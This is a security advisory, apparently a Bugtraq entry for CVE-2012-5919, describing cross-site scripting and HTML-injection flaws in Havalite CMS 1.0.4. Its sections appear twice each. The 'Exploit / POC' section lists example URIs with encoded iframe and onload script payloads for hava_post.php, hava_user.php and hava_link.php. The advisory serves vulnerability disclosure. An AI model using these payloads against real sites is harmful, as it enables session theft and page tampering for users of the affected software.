Havalite Multiple Cross Site Scripting and HTML Injection Vulnerabilities
BID:53199
Info
Havalite Multiple Cross Site Scripting and HTML Injection Vulnerabilities
| Bugtraq ID: | 53199 |
| Class: | Input Validation Error |
| CVE: |
CVE-2012-5919 |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 23 2012 12:00AM |
| Updated: | Dec 10 2012 04:00PM |
| Credit: | Benjamin Kunz Mejri |
| Vulnerable: |
Havalite Havalite 1.0.4 |
| Not Vulnerable: | |
Discussion
Havalite Multiple Cross Site Scripting and HTML Injection Vulnerabilities
Havalite is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible.
Havalite 1.0.4 is vulnerable; prior versions may also be affected.
Havalite is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible.
Havalite 1.0.4 is vulnerable; prior versions may also be affected.
Exploit / POC
Havalite Multiple Cross Site Scripting and HTML Injection Vulnerabilities
An attacker must trick an unsuspecting victim into following a malicious URI to exploit the cross-site scripting issues. An attacker can exploit the HTML-injection issues through a browser.
The following example URIs are available:
http://www.example.com/havalite/hava_post.php?postId=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
http://www.example.com/havalite/hava_user.php?userId=>"<iframe src=http://www.vulnerability-lab.com>
http://www.example.com/havalite/hava_link.php?linkId=1%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
An attacker must trick an unsuspecting victim into following a malicious URI to exploit the cross-site scripting issues. An attacker can exploit the HTML-injection issues through a browser.
The following example URIs are available:
http://www.example.com/havalite/hava_post.php?postId=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
http://www.example.com/havalite/hava_user.php?userId=>"<iframe src=http://www.vulnerability-lab.com>
http://www.example.com/havalite/hava_link.php?linkId=1%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
Solution / Fix
Havalite Multiple Cross Site Scripting and HTML Injection Vulnerabilities
Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Havalite Multiple Cross Site Scripting and HTML Injection Vulnerabilities
References:
References:
- Havalite : Security Vulnerabilities (itsecdb.com)
- Havalite CMS Homepage (Havalite)
- Havalite CMS v1.0.4 - Multiple Web Vulnerabilities (Benjamin Kunz Mejri)